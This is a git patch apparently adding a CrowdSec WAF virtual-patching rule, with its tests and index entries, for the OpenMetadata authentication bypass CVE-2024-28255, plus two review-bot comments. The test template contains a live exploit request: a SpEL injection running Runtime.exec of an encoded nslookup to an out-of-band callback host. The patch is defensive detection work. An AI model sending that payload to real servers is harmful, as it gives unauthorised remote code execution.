From 1bcbeb1ba210e966c71ce7a30ede872e86b807b1 Mon Sep 17 00:00:00 2001
From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com>
Date: Wed, 31 Jul 2024 11:07:41 +0200
Subject: [PATCH] Add CVE-2024-28255 (#1082)
* Add CVE-2024-28255
---------
Co-authored-by: GitHub Action
---
 .../vpatch-CVE-2024-28255/config.yaml | 5 +
 .../test-CVE-2024-28255.yaml | 25 ++++
 .index.json | 38 +++++-
 .../crowdsecurity/vpatch-CVE-2024-28255.yaml | 38 ++++++
 .../appsec-virtual-patching.yaml | 123 +++++++++---------
 taxonomy/scenarios.json | 22 ++++
 6 files changed, 187 insertions(+), 64 deletions(-)
 create mode 100644 .appsec-tests/vpatch-CVE-2024-28255/config.yaml
 create mode 100644 .appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml
 create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
diff --git a/.appsec-tests/vpatch-CVE-2024-28255/config.yaml b/.appsec-tests/vpatch-CVE-2024-28255/config.yaml
new file mode 100644
index 00000000000..ab73581a4fa
--- /dev/null
+++ b/.appsec-tests/vpatch-CVE-2024-28255/config.yaml
@@ -0,0 +1,5 @@
+
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
+nuclei_template: test-CVE-2024-28255.yaml
diff --git a/.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml b/.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml
new file mode 100644
index 00000000000..8ee35afb658
--- /dev/null
+++ b/.appsec-tests/vpatch-CVE-2024-28255/test-CVE-2024-28255.yaml
@@ -0,0 +1,25 @@
+
+id: test-CVE-2024-28255
+info:
+ name: test-CVE-2024-28255
+ author: crowdsec
+ severity: info
+ description: test-CVE-2024-28255 testing
+ tags: appsec-testing
+variables:
+ callback: "{{interactsh-url}}"
+ cmd: "nslookup {{callback}}"
+ payload: '{{base64(cmd)}}'
+http:
+ - raw:
+ - |
+ GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - "status_code_1 == 403"
+
diff --git a/.index.json b/.index.json
index 19a87914723..ebbe9e8ad8d 100644
--- a/.index.json
+++ b/.index.json
@@ -1876,6 +1876,33 @@
 "type": "exploit"
 }
 },
+ "crowdsecurity/vpatch-CVE-2024-28255": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "a8dcb3b263333cd588e22e561d24c4c7b9da54c1a83fcc8da60b4ac5acfacaae",
+ "deprecated": false
+ }
+ },
+ "content": "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",
+ "description": "OpenMetadata - Authentication Bypass (CVE-2024-28255)",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2024-28255",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-94"
+ ],
+ "confidence": 3,
+ "label": "OpenMetadata - Authentication Bypass",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
 "crowdsecurity/vpatch-CVE-2024-29849": {
 "path": "appsec-rules/crowdsecurity/vpatch-CVE-2024-29849.yaml",
 "version": "0.5",
@@ -2889,7 +2916,7 @@
 },
 "crowdsecurity/appsec-virtual-patching": {
 "path": "collections/crowdsecurity/appsec-virtual-patching.yaml",
- "version": "3.3",
+ "version": "3.4",
 "versions": {
 "0.1": {
 "digest": "a165d638c8d826a932e4ca4e70ec5379d558a0bee1356e871c7c92cc2df714fc",
@@ -3022,10 +3049,14 @@
 "3.3": {
 "digest": "7cd4bdca37098a2a398262c253dfa2d2925168b1820cc58ea62ea953a1517722",
 "deprecated": false
+ },
+ "3.4": {
+ "digest": "0b89691d948596e37fc998f369d2f782b0357f0036a6752ae5b3811566615236",
+ "deprecated": false
 }
 },
 "long_description": "IyBBcHBTZWMgVmlydHVhbCBQYXRjaGluZwoKVGhpcyBjb2xsZWN0aW9uIGNvbnRhaW5zIHZpcnR1YWwgcGF0Y2hpbmcgZm9yIGNvbW1vbmx5IGV4cGxvaXRlZCB2dWxuZXJhYmlsaXRpZXMsIGFuZCBpcyBpbnNwaXJlZCBieSB0aGUgW0NJU0EgS25vd24gRXhwbG9pdGVkIFZ1bG5lcmFiaWxpdGllcyBDYXRhbG9nXShodHRwczovL3d3dy5jaXNhLmdvdi9rbm93bi1leHBsb2l0ZWQtdnVsbmVyYWJpbGl0aWVzLWNhdGFsb2cpLiBUaGUgZ29hbCBpcyB0byBwcm92aWRlIHZpcnR1YWwgcGF0Y2hpbmcgY2FwYWJpbGl0aWVzIGZvciB0aGUgbW9zdCBvZnRlbiBleHBsb2l0ZWQgdnVsbmVyYWJpbGl0aWVzLCBhdm9pZGluZyBmYWxzZSBwb3NpdGl2ZXMgd2hpbGUgY2F0Y2hpbmcgcGVvcGxlIHNjb3V0aW5nIHlvdXIgYXBwbGljYXRpb25zIGZvciBqdWljeSB2dWxuZXJhYmlsaXRpZXMuCg==",
- "content": "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",
+ "content": "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",
 "description": "a generic virtual patching collection, suitable for most web servers.",
 "author": "crowdsecurity",
 "labels": null,
@@ -3086,7 +3117,8 @@
 "crowdsecurity/vpatch-CVE-2023-47218",
 "crowdsecurity/vpatch-git-config",
 "crowdsecurity/vpatch-CVE-2024-32113",
- "crowdsecurity/vpatch-CVE-2024-3272"
+ "crowdsecurity/vpatch-CVE-2024-3272",
+ "crowdsecurity/vpatch-CVE-2024-28255"
 ],
 "appsec-configs": [
 "crowdsecurity/virtual-patching",
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
new file mode 100644
index 00000000000..893a34df373
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2024-28255.yaml
@@ -0,0 +1,38 @@
+
+name: crowdsecurity/vpatch-CVE-2024-28255
+description: "OpenMetadata - Authentication Bypass (CVE-2024-28255)"
+rules:
+ - and:
+ - zones:
+ - METHOD
+ match:
+ type: equals
+ value: GET
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ - urldecode
+ match:
+ type: contains
+ value: /api/v1;v1/users/login/events/subscriptions/validation/condition
+ - zones:
+ - URI_FULL
+ transform:
+ - lowercase
+ match:
+ type: contains
+ value: "java.lang.runtime"
+
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: "http:exploit"
+ label: "OpenMetadata - Authentication Bypass"
+ classification:
+ - cve.CVE-2024-28255
+ - attack.T1595
+ - attack.T1190
+ - cwe.CWE-94
\ No newline at end of file
diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml
index 56ab52c18f1..6c570c5382b 100644
--- a/collections/crowdsecurity/appsec-virtual-patching.yaml
+++ b/collections/crowdsecurity/appsec-virtual-patching.yaml
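Review bot: The third condition (zones `URI_FULL`, contains `"java.lang.runtime"`) applies only `lowercase`, while the `URI` condition directly above it applies `lowercase` and `urldecode`; because the three conditions are joined with `and`, a request whose class name is percent-encoded in the path or query satisfies the first two conditions but not the third and the rule stays silent, even though the target presumably decodes the path before evaluating it. Add `- urldecode` under `- lowercase` in that condition's `transform` list so all three conditions compare the same normalised form. The file also ends without a trailing newline (`\ No newline at end of file`); add one to match the other rule files.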
@@ -1,64 +1,65 @@
-name: crowdsecurity/appsec-virtual-patching
-appsec-rules:
- - crowdsecurity/base-config
- - crowdsecurity/vpatch-env-access
- - crowdsecurity/vpatch-CVE-2023-40044
- - crowdsecurity/vpatch-CVE-2017-9841
- - crowdsecurity/vpatch-CVE-2020-11738
- - crowdsecurity/vpatch-CVE-2022-27926
- - crowdsecurity/vpatch-CVE-2022-35914
- - crowdsecurity/vpatch-CVE-2022-46169
- - crowdsecurity/vpatch-CVE-2023-20198
- - crowdsecurity/vpatch-CVE-2023-22515
- - crowdsecurity/vpatch-CVE-2023-33617
- - crowdsecurity/vpatch-CVE-2023-34362
- - crowdsecurity/vpatch-CVE-2023-3519
- - crowdsecurity/vpatch-CVE-2023-42793
- - crowdsecurity/vpatch-CVE-2023-50164
- - crowdsecurity/vpatch-CVE-2023-38205
- - crowdsecurity/vpatch-CVE-2023-24489
- - crowdsecurity/vpatch-CVE-2021-3129
- - crowdsecurity/vpatch-CVE-2021-22941
- - crowdsecurity/vpatch-CVE-2019-12989
- - crowdsecurity/vpatch-CVE-2022-44877
- - crowdsecurity/vpatch-CVE-2018-10562
- - crowdsecurity/vpatch-CVE-2023-6553
- - crowdsecurity/vpatch-CVE-2018-1000861
- - crowdsecurity/vpatch-CVE-2019-1003030
- - crowdsecurity/vpatch-CVE-2022-22965
- - crowdsecurity/vpatch-CVE-2023-23752
- - crowdsecurity/vpatch-CVE-2023-49070
- - crowdsecurity/vpatch-laravel-debug-mode
- - crowdsecurity/vpatch-CVE-2023-28121
- - crowdsecurity/vpatch-CVE-2020-17496
- - crowdsecurity/vpatch-CVE-2023-1389
- - crowdsecurity/vpatch-CVE-2023-7028
- - crowdsecurity/vpatch-CVE-2023-46805
- - crowdsecurity/vpatch-CVE-2024-23897
- - crowdsecurity/vpatch-CVE-2023-22527
- - crowdsecurity/vpatch-CVE-2023-35078
- - crowdsecurity/vpatch-CVE-2023-35082
- - crowdsecurity/vpatch-CVE-2022-22954
- - crowdsecurity/vpatch-CVE-2024-1212
- - crowdsecurity/vpatch-symfony-profiler
- - crowdsecurity/vpatch-connectwise-auth-bypass
- - crowdsecurity/vpatch-CVE-2024-22024
- - crowdsecurity/vpatch-CVE-2024-27198
- - crowdsecurity/vpatch-CVE-2024-3273
- - crowdsecurity/vpatch-CVE-2024-4577
- - crowdsecurity/vpatch-CVE-2024-29849
- - crowdsecurity/vpatch-CVE-2023-47218
- - crowdsecurity/vpatch-git-config
- - crowdsecurity/vpatch-CVE-2024-32113
- - crowdsecurity/vpatch-CVE-2024-3272
 appsec-configs:
- - crowdsecurity/virtual-patching
- - crowdsecurity/appsec-default
+- crowdsecurity/virtual-patching
+- crowdsecurity/appsec-default
+appsec-rules:
+- crowdsecurity/base-config
+- crowdsecurity/vpatch-env-access
+- crowdsecurity/vpatch-CVE-2023-40044
+- crowdsecurity/vpatch-CVE-2017-9841
+- crowdsecurity/vpatch-CVE-2020-11738
+- crowdsecurity/vpatch-CVE-2022-27926
+- crowdsecurity/vpatch-CVE-2022-35914
+- crowdsecurity/vpatch-CVE-2022-46169
+- crowdsecurity/vpatch-CVE-2023-20198
+- crowdsecurity/vpatch-CVE-2023-22515
+- crowdsecurity/vpatch-CVE-2023-33617
+- crowdsecurity/vpatch-CVE-2023-34362
+- crowdsecurity/vpatch-CVE-2023-3519
+- crowdsecurity/vpatch-CVE-2023-42793
+- crowdsecurity/vpatch-CVE-2023-50164
+- crowdsecurity/vpatch-CVE-2023-38205
+- crowdsecurity/vpatch-CVE-2023-24489
+- crowdsecurity/vpatch-CVE-2021-3129
+- crowdsecurity/vpatch-CVE-2021-22941
+- crowdsecurity/vpatch-CVE-2019-12989
+- crowdsecurity/vpatch-CVE-2022-44877
+- crowdsecurity/vpatch-CVE-2018-10562
+- crowdsecurity/vpatch-CVE-2023-6553
+- crowdsecurity/vpatch-CVE-2018-1000861
+- crowdsecurity/vpatch-CVE-2019-1003030
+- crowdsecurity/vpatch-CVE-2022-22965
+- crowdsecurity/vpatch-CVE-2023-23752
+- crowdsecurity/vpatch-CVE-2023-49070
+- crowdsecurity/vpatch-laravel-debug-mode
+- crowdsecurity/vpatch-CVE-2023-28121
+- crowdsecurity/vpatch-CVE-2020-17496
+- crowdsecurity/vpatch-CVE-2023-1389
+- crowdsecurity/vpatch-CVE-2023-7028
+- crowdsecurity/vpatch-CVE-2023-46805
+- crowdsecurity/vpatch-CVE-2024-23897
+- crowdsecurity/vpatch-CVE-2023-22527
+- crowdsecurity/vpatch-CVE-2023-35078
+- crowdsecurity/vpatch-CVE-2023-35082
+- crowdsecurity/vpatch-CVE-2022-22954
+- crowdsecurity/vpatch-CVE-2024-1212
+- crowdsecurity/vpatch-symfony-profiler
+- crowdsecurity/vpatch-connectwise-auth-bypass
+- crowdsecurity/vpatch-CVE-2024-22024
+- crowdsecurity/vpatch-CVE-2024-27198
+- crowdsecurity/vpatch-CVE-2024-3273
+- crowdsecurity/vpatch-CVE-2024-4577
+- crowdsecurity/vpatch-CVE-2024-29849
+- crowdsecurity/vpatch-CVE-2023-47218
+- crowdsecurity/vpatch-git-config
+- crowdsecurity/vpatch-CVE-2024-32113
+- crowdsecurity/vpatch-CVE-2024-3272
+- crowdsecurity/vpatch-CVE-2024-28255
+author: crowdsecurity
+contexts:
+- crowdsecurity/appsec_base
+description: a generic virtual patching collection, suitable for most web servers.
+name: crowdsecurity/appsec-virtual-patching
 parsers:
- - crowdsecurity/appsec-logs
+- crowdsecurity/appsec-logs
 scenarios:
- - crowdsecurity/appsec-vpatch
-contexts:
- - crowdsecurity/appsec_base
-description: "a generic virtual patching collection, suitable for most web servers."
-author: crowdsecurity
+- crowdsecurity/appsec-vpatch
diff --git a/taxonomy/scenarios.json b/taxonomy/scenarios.json
index 587a4c7d423..283623f1536 100644
--- a/taxonomy/scenarios.json
+++ b/taxonomy/scenarios.json
@@ -1125,6 +1125,28 @@
 "CWE-94"
 ]
 },
+ "crowdsecurity/vpatch-CVE-2024-28255": {
+ "name": "crowdsecurity/vpatch-CVE-2024-28255",
+ "description": "OpenMetadata - Authentication Bypass (CVE-2024-28255)",
+ "label": "OpenMetadata - Authentication Bypass",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2024-28255"
+ ],
+ "cwes": [
+ "CWE-94"
+ ]
+ },
 "crowdsecurity/vpatch-CVE-2024-29849": {
 "name": "crowdsecurity/vpatch-CVE-2024-29849",
 "description": "Veeam Backup Enterprise Manager - Authentication Bypass (CVE-2024-29849)",
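Review bot: The collection file in `collections/crowdsecurity/appsec-virtual-patching.yaml` is rewritten wholesale — keys re-sorted alphabetically, list-item indentation dropped, the quotes around `description` removed — so a one-entry addition appears as 64 deletions and 65 insertions and the real change, `+- crowdsecurity/vpatch-CVE-2024-28255`, is buried in the churn. If this re-serialisation comes from the GitHub Action credited as co-author, have it append the entry in the existing layout, or land the reformat as its own commit, so that blame and future review of this file stay meaningful. As far as these lines show the resulting YAML is semantically equivalent to the old one, so no functional regression is implied.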